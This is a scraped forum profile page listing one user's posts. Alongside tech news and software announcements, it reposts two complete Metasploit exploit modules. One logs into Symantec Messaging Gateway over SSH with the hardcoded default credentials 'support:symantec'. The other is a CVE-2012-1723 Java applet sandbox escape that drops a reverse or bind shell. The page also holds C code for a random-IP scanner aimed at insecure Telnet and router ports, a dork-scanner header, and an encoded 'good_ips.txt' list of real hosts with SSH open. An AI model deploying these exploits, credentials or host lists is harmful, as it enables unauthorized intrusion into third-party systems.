Jump to content

Fi8sVrs

Active Members
 View Profile  See their activity

  • Posts

    3206

  • Joined

  • Days Won

    87

 Content Type 

Everything posted by Fi8sVrs

  1. Fi8sVrs

    jsTree

    Fi8sVrs posted a topic in Programare

    jsTree is a javascript based, cross browser tree component. It is packaged as a jQuery plugin. jsTree is absolutely free (licensed same as jQuery – under the terms of either the MIT License or the GNU General Public License (GPL) Version 2). Features at a glance: Various data sources - HTML, JSON, XML Drag & drop support Theme support + included themes Optional keyboard navigation Inline editing Define node types and fine tune them Optional checkbox tree support Supports plugins Supports AJAX loading Highly configurable Uses jQuery's event system Maintain the same tree in many languages Open/close optional animation Configurable multitree drag & drop Search function Optional state saving using cookies Currently supported browsers are: Internet Explorer 6+ * Mozilla Firefox 2+ Safari 3+ Opera 9+ Google Chrome download source
  2. Fi8sVrs
    The university, which pioneered massive open online courses, unveils two new homegrown software platforms to host the courses. Fall quarter's free online courses cover a wide range of fields including computer science, mathematics, linguistics, science writing, sociology and education. Sixteen courses and two new platforms for interactive learning will highlight Stanford's free online offerings this fall, with more to follow during winter and spring quarters. From cryptography to science writing, technology entrepreneurship, finance and a crash course in creativity, the courses are open to anyone with a computer, anywhere. As the number of Stanford online courses has grown, so too has the range of fields, which now include computer science, mathematics, linguistics, science writing, sociology and education. Stanford is unique among universities in that it is offering its online courses on more than one platform. Each has its own distinct features and capabilities, among them video lectures, discussion forums, peer assessment, problem sets, quizzes and team projects. An open-source platform called Class2Go, developed by a team of Stanford engineers, will host An Introduction to Computer Networks, taught by Nick McKeown – an entrepreneur and a professor of electrical engineering and of computer science, whose networking startup, Nicira, was just acquired by VMware – and his colleague Philip Levis. Class2Go also will host a course on solar cells taught by physicist Bruce Clemens. Also notable is a team-based course, Technology Entrepreneurship, taught by Chuck Eesley, assistant professor of management science and engineering; the course garnered 37,000 students when it first appeared last spring. It is hosted on another new platform, Venture Lab, developed by Stanford faculty member Amin Saberi specifically for classes in which students work in teams. The most widely available online learning platform, Coursera, will host nine Stanford courses this quarter, among them a new course, Writing in the Sciences, taught by epidemiologist Kristin Sainani, as well as Scott Klemmer's Human-Computer Interaction, which last spring enrolled around 29,000 students. Coursera was developed by two Stanford computer scientists who currently are on leave. Students interested in registering should go to the course websites listed below or to the Stanford Online website, where updates will be available as new courses appear. Here is a list of fall quarter classes, with instructor, course title, start date and platform: Andrew Ng, Machine Learning, Aug. 20, Coursera https://www.coursera.org/course/ml Dan Boneh, Cryptography, Aug. 27, Coursera https://www.coursera.org/course/crypto Keith Devlin, Introduction to Mathematical Thinking, Sept. 17, Coursera https://www.coursera.org/course/maththink Daphne Koller, Probabilistic Graphical Models, Sept. 24, Coursera https://www.coursera.org/course/pgm Scott Klemmer, Human-Computer Interaction, Sept. 24, Coursera https://www.coursera.org/course/hci Michael Genesereth, Introduction to Logic, Sept. 24, Coursera https://www.coursera.org/course/intrologic Dan McFarland, Organizational Analysis, Sept. 24, Coursera https://www.coursera.org/course/organalysis Kristin Sainani, Writing in the Sciences, Sept. 24, Coursera https://www.coursera.org/course/sciwrite Tim Roughgarden, Algorithms: Design and Analysis, Part 2, October, Coursera https://www.coursera.org/course/algo2 Chuck Eesley, Technology Entrepreneurship, Fall, Venture Lab Venture Lab Tina Seelig, A Crash Course on Creativity, Fall, Venture Lab Venture Lab Paul Kim, Designing a New Learning Environment, Fall, Venture Lab Venture Lab Kay Giesecke, Finance, Fall, Venture Lab Venture Lab Clint Korver, Startup Boards: Advanced Entrepreneurship, Fall, Venture Lab Venture Lab Bruce Clemens, Solar Cells, Fuel Cells and Batteries, Oct. 8, Class2Go http://solar.class.stanford.edu Nick McKeown and Philip Levis, An Introduction to Computer Networks, Oct. 8, Class2Go http://networking.class.stanford.edu Source
  3. Fi8sVrs
    Sql Code Guard is a free addin for SSMS (2005/2008/2008R2)* that's provides fast and comprehensive static analysis for T-Sql code, shows code complexity and objects dependencies * Visual studio 2010 and database project are also supported Great news! Now SqlCodeGuard provides simple basic API to use its powerful analyze abilities in yours custom solutions! (assembly and sample project included) Don't be shy - download Sql Code Guard 2.1.4634 (updated 2012-09-09) right now (changelog) Do you have any suggestions? Bugreport? Feel free to contact me SqlCodeGuard <at> gmail.com Code issues Want to be sure that your code is “best practice” compliant? Need check for hidden pitfalls? There it is – Code issues window! You can analyze as single script and the entire database with only few mouse clicks! More than hundred of rules to check – from stylish to potential errors Object dependencies Wondering who use this table? Procedure? Function? Or maybe you want to know – which procedures makes modification to this table or view? Trying to omit well-known error 208? Want to know if you missed some objects? Object dependencies are right for you! Explore your database with single mouse click! Code complexity Worried about you code? It seems too complex to understand? Find complexity of your code! In combination with Code outline you can fast and easy find most complex procedure or function in your database and review it. Code Outline Lost in your “too-complex-to-navigate” procedure? Use Code Outline for quick and simple navigation through workflow of your code! Complexity analyze of each navigated statement provided! SqlCodeGuard - free tool for T-SQL Analyse SqlCodeGuard - free addin for SSMS for static T-Sql analysis
  4. Fi8sVrs
    http://www.youtube.com/watch?v=wCVwdvufTds Features Live HTML/CSS/JS editing preview for Google Chrome — no more window-switching needed. Google Closure Compiler JSDoc annotations support Initial Jade templates support Better JavaScript code completion (faster and smarter) Lots of improvements for Sass/SCSS: better code completion, navigation, code formatting and support for advanced constructs JSTestDriver tests debugging Project-level JS libraries and many other changes. System requirements Microsoft Windows 7 (incl.64-bit)/Vista/2003/XP/2000 Intel Pentium III/800 MHz or higher (or compatible) 512 MB free RAM minimum 1 GB RAM recommended 1024x768 minimum screen resolution Instructions Run the WebStorm-*.exe file that starts the Installation Wizard Follow all steps suggested by the wizard. Please pay special attention to the corresponding installation options Download WebStorm 5.0 released: introduces Live Edit and Jade, better JSDoc and Sass/SCSS & more | WebStorm & PhpStorm Blog
  5. Fi8sVrs
    The Metropolitan Police have issued an urgent warning about a new ransom malware that is in circulation. Ransomware (also referred to in some cases as cryptoviruses, cryptotrojans or cryptoworms) comprises a class of malware which restricts access to the computer system that it infects, and demands a ransom paid to the creator of the malware in order for the restriction to be removed. Ransomware typically propagates like a typical computer worm, entering a system through, for example, a downloaded file or a vulnerability in a network service. The program will then run a payload which will begin to encrypt personal files on the hard drive. More sophisticated ransomware may hybrid-encrypt the victim's plaintext with a random symmetric key and a fixed public key. The malware author is the only party that knows the needed private decryption key. Some ransomware payloads do not use encryption. In these cases, the payload is simply an application designed to effectively restrict interaction with the system, typically by overriding explorer.exe in the Windows registry as the default shell, or even modify the master boot record, not allowing the operating system to start at all until it is repaired. We request readers to share this article with your friends on all social networks to alert them that this is a fraud and users are advised not to pay out any monies or hand out any bank details. Police advice - Modern ransomware attacks were initially popular within Russia, but in recent years there have been an increasing number of ransomware attacks targeted towards other countries, such as Australia, Germany, and the United States among others. In order to reduce the chances of being infected by this or similar malware we strongly recommend to use Some Best Antiviruses and never forget to update your software & potential vulnerabilities. source
  6. Fi8sVrs
    This Metasploit module exploits a default misconfiguration flaw on Symantec Messaging Gateway. The 'support' user has a known default password, which can be used to login to the SSH service, and gain privileged access from remote. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'net/ssh' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::CommandShell def initialize(info={}) super(update_info(info, 'Name' => "Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability", 'Description' => %q{ This module exploits a default misconfiguration flaw on Symantec Messaging Gateway. The 'support' user has a known default password, which can be used to login to the SSH service, and gain privileged access from remote. }, 'License' => MSF_LICENSE, 'Author' => [ 'Stefan Viehbock', #Original discovery 'Ben Williams', #Reporting the vuln + coordinated release 'sinn3r' #Metasploit ], 'References' => [ ['CVE', '2012-3579'], ['OSVDB', '85028'], ['BID', '55143'], ['URL', 'https://www.sec-consult.com/files/20120829-0_Symantec_Mail_Gateway_Support_Backdoor.txt'], ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00'] ], 'DefaultOptions' => { 'ExitFunction' => "none" }, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find' } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [ ['Symantec Messaging Gateway 9.5', {}], ], 'Privileged' => true, #Timestamp on Symantec advisory #But was found on Jun 26, 2012 'DisclosureDate' => "Aug 27 2012", 'DefaultTarget' => 0)) register_options( [ Opt::RHOST(), Opt::RPORT(22) ], self.class ) register_advanced_options( [ OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) end def rhost datastore['RHOST'] end def rport datastore['RPORT'] end def do_login(user, pass) opts = { :auth_methods => ['password', 'keyboard-interactive'], :msframework => framework, :msfmodule => self, :port => rport, :disable_agent => true, :config => false, :password => pass, :record_auth_info => true, :proxies => datastore['Proxies'] } opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] begin ssh = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh = Net::SSH.start(rhost, user, opts) end rescue Rex::ConnectionError, Rex::AddressInUse return rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" return rescue ::Timeout::Error print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" return rescue Net::SSH::AuthenticationFailed print_error "#{rhost}:#{rport} SSH - Failed authentication" rescue Net::SSH::Exception => e print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" return end if ssh conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true) ssh = nil return conn end return nil end def exploit user = 'support' pass = 'symantec' print_status("#{rhost}:#{rport} - Attempt to login...") conn = do_login(user, pass) if conn print_good("#{rhost}:#{rport} - Login Successful with '#{user}:#{pass}'") handler(conn.lsock) end end end mirror source
  7. Fi8sVrs
    "The Pirate Bay team is going to be making the RIAA angry, with the launch of a new ad-supported VPN service. PrivitizeVPN is available for free from The Pirate Bay. Instead of earning revenue through subscription as ipredator does, PrivitizeVPN comes packaged to install the Babylon search bar (adware). PrivitizeVPN appears to be available for Windows users only at the moment. The Pirate Bay staff has a long history of promoting services that have no logs; e.g. , you can't get in trouble if your anonymized IP is subpoenaed by government officials. Although PrivitizeVPN is being released silently, with no press coverage, no official statement, and no comments from The Pirate Bay of any kind, people are assuming that PrivitizeVPN will have the same familiar data protection policies. A backup download location has been setup here for people who have limited access to the Pirate Bay domain." The Pirate Bay Launches Free VPN - Slashdot
  8. Fi8sVrs

    cPanels

    Fi8sVrs posted a topic in Programe utile

    pastebin via r00tw0rm
  9. Fi8sVrs
    vezi pe aici: https://rstcenter.com/forum/52016-smtp-sms-gateway.rst
  10. Fi8sVrs
    /* Compile with: gcc thrip.c -o thrip -pthread This is a multithreaded scanner that scans many ip addresses on a specified port simultaneously. It is very useful for finding insecure systems when used with such ports as 23 (Telnet) or 8080, which is the web interface for many routers. The author of this program takes no responsiblity for the actions of its users. If you have any comments or suggestions, feeel free to contact me at this email: grell64[at]gmail.com. Thanks and enjoy. -Grell */ /* Compile with: gcc thrip.c -o thrip -pthread This is a multithreaded scanner that scans many ip addresses on a specified port simultaneously. It is very useful for finding insecure systems when used with such ports as 23 (Telnet) or 8080, which is the web interface for many routers. The author of this program takes no responsiblity for the actions of its users. If you have any comments or suggestions, feeel free to contact me at this email: grell64@gmail.com. Thanks and enjoy. -Grell */ #include <stdio.h> #include <string.h> #include <time.h> #include <stdlib.h> #include <pthread.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <errno.h> void usage(char *); void *net_thread(void *); FILE *glob_file; int glob_port; static pthread_mutex_t mtx = PTHREAD_MUTEX_INITIALIZER; static pthread_mutex_t mtx2 = PTHREAD_MUTEX_INITIALIZER; int main(int argc, char *argv[]) { int numthreads, rc; long i; srand(time(NULL)); if(argc != 4) usage(argv[0]); glob_port = atoi(argv[1]); numthreads = atoi(argv[2]); unsigned long *taskids[numthreads]; pthread_t thread_array[numthreads]; glob_file = fopen(argv[3], "w+"); // generate array of random ip addresses for(i = 0; i <= numthreads; i++) { taskids[i] = (long *) malloc(sizeof(long)); *taskids[i] = i; rc = pthread_create(&thread_array[i], NULL, net_thread, (void *) taskids[i]); } // wait for all threads to finish for(i = 0; i <= numthreads; i++) { pthread_join(thread_array[i], NULL); } return 0; } void usage(char *progname) { fprintf(stderr, "Usage: %s <port> <numthread> <output file>\n", progname); exit(1); } void *net_thread(void *thr_arg) { int sockfd, s, g; unsigned long connip; unsigned int a, b, c, d; struct sockaddr_in mysock; char str_ip[30]; connip = (rand()) * (long) (thr_arg); // separate bytes in connip a = (connip >> 24 & 0xFF); b = (connip >> 16 & 0xFF); c = (connip >> 8 & 0xFF); d = (connip & 0xFF); if(a == 0x7F){ //loopback return 0; } s = pthread_mutex_lock(&mtx); printf("Scanning: %d.%d.%d.%d\n", a, b, c, d); fflush(stdout); s = pthread_mutex_unlock(&mtx); if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){ perror("socket"); pthread_exit(NULL); } snprintf(str_ip, sizeof(str_ip), "%d.%d.%d.%d", a, b, c, d); bzero(&mysock, sizeof(mysock)); mysock.sin_family = AF_INET; mysock.sin_port = htons(glob_port); // short, network byte order mysock.sin_addr.s_addr = htonl(connip); if((connect(sockfd, (struct sockaddr *) &mysock, sizeof(mysock))) == -1){ switch(errno){ case ECONNREFUSED: case ETIMEDOUT: // add mutex s = pthread_mutex_lock(&mtx); fprintf(glob_file, "Port %d Closed on %s\n", glob_port, str_ip); fflush(glob_file); s = pthread_mutex_unlock(&mtx); break; default: break; } return 0; } /* connection succeeds */ else{ g = pthread_mutex_lock(&mtx2); fprintf(glob_file, "Port %d Open on %s\n", glob_port, str_ip); fflush(glob_file); g = pthread_mutex_unlock(&mtx2); return 0; } return 0; } Thrip Port Scanner ? Packet Storm
  11. Fi8sVrs
    This is w0rmy's Codebase, a database with snippets. You DO NOT have rights to re-sell this! This is a freeware. You MAY post this anywhere, with given credits (below). Snippets added by: flAmingw0rm Special thanks to StarZ (coder of this) and Aeonhack (Editor). Enjoy. Zippyshare.com - w0rmyCodebase.rar Download w0rmyCodebase.rar from Sendspace.com - send big files the easy way Download w0rmy.Codebase.rar @ UppIT level-23.biz
  12. Fi8sVrs
    e veche ideea, insa mai sunt multi care pica in special onanistii
  13. Fi8sVrs
    #!/usr/bin/python # # smartd0rk3r.py - a modified darkd0rk3r # - added dork array # - added input for number of random dorks # - added bugfix for over tor (it crashed alot over tor) # - added optimization, 1 page with 0 results, skip to next dork # - added extra check for links to comply with target (makes it alot more target-specific) # put main instructions together, added 12 - new scan option # - added Column Finder # # rewrite done by levi # Column Finder added by baltazar # mad propz to the original author for making a nice script that was easily modified!!!! # # original header: # # This was written for educational purpose and pentest only. Use it at your own risk. # Author will be not responsible for any damage! # !!! Special greetz for my friend sinner_01 !!! # Toolname : darkd0rk3r.py # Coder : baltazar a.k.a b4ltazar < [email]b4ltazar@gmail.com[/email]> # Version : 0.8 # Greetz for rsauron and low1z, great python coders # greetz for d3hydr8, r45c4l, qk, fx0, Soul, MikiSoft, c0ax, b0ne, tek0t and all members of ex darkc0de.com, ljuska.org [Python] smartd0rk3r.py v.0.2 - Pastebin.com source .
  14. Fi8sVrs
    New York City Pay Phone Booths Now Free WiFi Hotspots New York City is committed to making sure the 12,000 phone booths still lining its sidewalks don't become relics. While the city announced plans to turn some of them into digital kiosks with SmartScreens in April, today it launched a pilot program to provide free public WiFi at public phone booths around the five boroughs. WATCH: A Look At the New WiFi-Equipped Phone Booths The first ten booths were lit up today with WiFi routers that are attached the top of existing phone booths. A map of the WiFi-equipped booths can be found here. There are six booths in Manhattan, two in Brooklyn, and one in Queens for the time being. Additional locations, including ones in the Bronx and Staten Island, will be added soon. The city's Department of Information Technology and Telecommunications (DoITT) has worked with Van Wagner and Titan, the advertising companies that work to provide the ads on the booths, to provide the service. Those companies have absorbed the cost of the project, including installation, management, and customer service; there is no additional cost to the city or to the public. And wireless capabilities won't replace the actual pay phones. "We are not trying to replace the pay phone with something else," Rhaul N. Merchant, Citywide Chief Information and Innovation Officer, said at the unveiling of the new booth on 58th Street and Broadway. "We want to see what else our citizens want in a pay phone." The wireless signal of the pay phone booths will span an 100 to 200 foot radius and the network will appear as "Free WiFi" or "NYC Free Public WiFi" on phones, laptops, tablets, and other WiFi devices. The network isn't password protected, but when you launch your browser, you will be required to agree to terms and conditions before surfing the web. "The city and the partners have taken all security measures and we will continue to make sure it the best possible experience for new Yorkers who are signing on to the WiFi," Rachel Sterne, New York's Chief Digital Officer, assured ABC News. Users can visit any site on the internet and there is no limit on usage. No personal information will be gathered from people's devices, and no advertising will appear during the pilot program, Sterne said. via: New York City Pay Phone Booths Now Free WiFi Hotspots - ABC News
  15. Fi8sVrs
    This Metasploit module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) def initialize( info = {} ) super( update_info( info, 'Name' => 'Java Applet Field Bytecode Verifier Cache Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficent type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations. }, 'License' => MSF_LICENSE, 'Author' => [ 'Stefan Cornellius', # Discoverer 'mihi', # Vuln analysis 'littlelightlittlefire', # metasploit module 'juan vazquez', # merged code (overlapped) 'sinn3r' # merged code (overlapped) ], 'References' => [ ['CVE', '2012-1723'], ['OSVDB', '82877'], ['BID', '52161'], ['URL', 'http://schierlm.users.sourceforge.net/CVE-2012-1723.html'], ['URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2012-1515912.html'], ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=829373'], ['URL', 'http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/253e7c32def9'], ['URL', 'http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/8f86ad60699b'] ], 'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], [ 'Mac OS X PPC (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_PPC } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86 } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 06 2012' )) end def exploit # load the static jar file path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-1723.jar" ) fd = File.open( path, "rb" ) @jar_data = fd.read(fd.stat.size) fd.close super end def on_request_uri( cli, request ) data = "" host = "" port = "" if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_redirect( cli, get_resource() + '/', '') return end print_status("Sending #{self.name}") payload = regenerate_payload( cli ) if not payload print_error("Failed to generate the payload." ) return end if target.name == 'Generic (Java Payload)' if datastore['LHOST'] jar = payload.encoded host = datastore['LHOST'] port = datastore['LPORT'] vprint_status("Sending java reverse shell") else port = datastore['LPORT'] datastore['RHOST'] = cli.peerhost vprint_status( "Java bind shell" ) end if jar print_status( "Generated jar to drop (#{jar.length} bytes)." ) jar = Rex::Text.to_hex( jar, prefix="" ) else print_error("Failed to generate the executable." ) return end else # NOTE: The EXE mixin automagically handles detection of arch/platform data = generate_payload_exe if data print_status("Generated executable to drop (#{data.length} bytes)." ) data = Rex::Text.to_hex( data, prefix="" ) else print_error("Failed to generate the executable." ) return end end send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } ) return end print_status("Sending jar") send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end def generate_html( data, jar, host, port ) jar_name = rand_text_alpha(rand(6)+3) + ".jar" html = "<html><head></head>" html += "<body>" html += "<applet archive=\"#{jar_name}\" code=\"cve1723.Attacker\" width=\"1\" height=\"1\">" html += "<param name=\"data\" value=\"#{data}\"/>" if data html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar html += "<param name=\"lhost\" value=\"#{host}\"/>" if host html += "</applet></body></html>" return html end def generate_jar() @jar_data end end http://packetstorm.crazydog.pt/1207-exploits/java_verifier_field_access.rb.txt Source Java Applet Field Bytecode Verifier Cache Remote Code Execution ? Packet Storm
  16. Fi8sVrs
    The question-and-answer site informs users that some of their passwords may have been breached in a security intrusion. Formspring has suffered a security intrusion in which some of its user passwords may have been breached, the question-and-answer site warned today. Formspring, which said it only learned of the network intrusion this morning, responded by disabling all users' passwords. "We apologize for the inconvenience but prefer to play it safe and have asked all members to reset their passwords," Formspring founder and CEO Ade Olonoh said in a company blog post. "Users will be prompted to change their passwords when they log back into Formspring. " A Formspring spokesperson told CNET that the company was tipped off to breach by someone who spotted about 420,000 passwords posted to a security forum that appeared to come from Formspring. "Once we were able to verify that the hashes were obtained from Formspring, we locked down our systems and began an investigation to determine the nature of the breach," Dorothee Fisher said. "We found that someone had accessed into one of our development servers and was able to extract account information from a production database. We were able to immediately fix the hole and are reviewing our internal security policies and practices to help ensure that this never happens again." The San Francisco-based startup, which launched its site in 2009, announced earlier this year that it had nearly 28 million users. In the blog's comments section, many dissatisfied users expressed a desire to have their accounts deleted, but a company representative assured them that their passwords had all been "salted," a cryptography technique that makes it harder to uncover the actual password. The blog went on to give users a tutorial in creating strong passwords -- a helpful reminder in the wake of more high-profile password thefts at LinkedIn, eHarmony, and Last.fm. Their users passwords were among approximately 8 million posted in two separate lists to hacker sites in early June. It appears that while they were hashed, they were not salted Source Formspring disables user passwords in security breach | Security & Privacy - CNET News
  17. Fi8sVrs
    THE FREE HANDWRITING CALCULATOR FOR YOUR ANDROID DEVICES With MyScript© Calculator, perform mathematical operations naturally using your handwriting. Easy, simple and intuitive, just write the mathematical expression on the screen then let MyScript technology perform its magic converting symbols and numbers to digital text and delivering the result in real time. The same experience as writing on paper with the advantages of a digital device (Scratch-outs, results in real time, ...). BENEFITS AND FEATURES - Works on your Android smartphone - Works on your Android tablet - Use your handwriting to write any arithmetic formula. - Write and calculate mathematical expressions in an intuitive and natural way with no keyboard - Supported mathematical symbols: +, -, ×, /, ?, Pi, parentheses - Scratch-out gestures to easily delete symbols and numbers Download https://play.google.com/store/apps/details?id=com.visionobjects.calculator Source
  18. Fi8sVrs

    Lele

    Fi8sVrs replied to adonisslanic's topic in Programare

    good_ips.txt with Hostname SVAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBQaW5nJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwSG9zdG5hbWUlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBQb3J0cyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQTkzLjE5MS4yNDEuMTQ4JTIwJTIwNDMlMjBtcyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMDkzLTE5MS0yNDEtMTQ4LnZtZG5zLm5ldDIyJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTBBNzIuNDMuMjE0LjY3JTIwJTIwJTIwJTIwLTEwOSUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwcnJjcy03Mi00My0yMTQtNjcubnlzLmJpei5yci5jb20yMiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQTIxNi41Ny42NS4xOTMlMjAlMjAlMjAtMjclMjBtcyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1Qm4vYSU1RCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMDIyJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTBBODguMjM1LjE2MS4xNSUyMCUyMCUyMDUwJTIwbXMlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNUJuL2ElNUQlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAyMiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQTk1LjE4LjE4NS4xNDclMjAlMjAlMjAtMTA5JTIwbXMlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAxNDcuMTg1LjE4Ljk1LmR5bmFtaWMuamF6enRlbC5lczIyJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTBBOTEuMTIzLjIwNC45MCUyMCUyMCUyMDEwMSUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTVCbi9hJTVEJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEE5MS4xMjEuMTg0LjkwJTIwJTIwJTIwNDElMjBtcyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMG5zMzY0MjE2Lm92aC5uZXQlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAyMiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQTIxNi4xMDguMjM2LjE0NiUyMDQzMSUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTVCbi9hJTVEJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEExMDcuNi42Ni4xMzAlMjAlMjAlMjAlMjAtMTIyJTIwbXMlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNUJuL2ElNUQlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAyMiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQTIwMS40Ny4yMDcuMiUyMCUyMCUyMCUyMDI3MiUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwMjAxLjQ3LjIwNy4yLmR5bmFtaWMuYWRzbC5ndnQubmV0LmJyMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEE3NC4yMTMuMjcuMjUlMjAlMjAlMjAlMjAtOTYlMjBtcyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1Qm4vYSU1RCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMDIyJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTBBNzguNDcuMjguNzQlMjAlMjAlMjAlMjAlMjAzNiUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwbWFpbDAxLmhhZWJpLmxpJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEE3NC4xMTUuMjUzLjIwOSUyMCUyMC05NCUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTVCbi9hJTVEJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEEyMTkuMTQwLjY4LjYlMjAlMjAlMjAlMjAyOTglMjBtcyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1Qm4vYSU1RCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMDIyJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTBBMT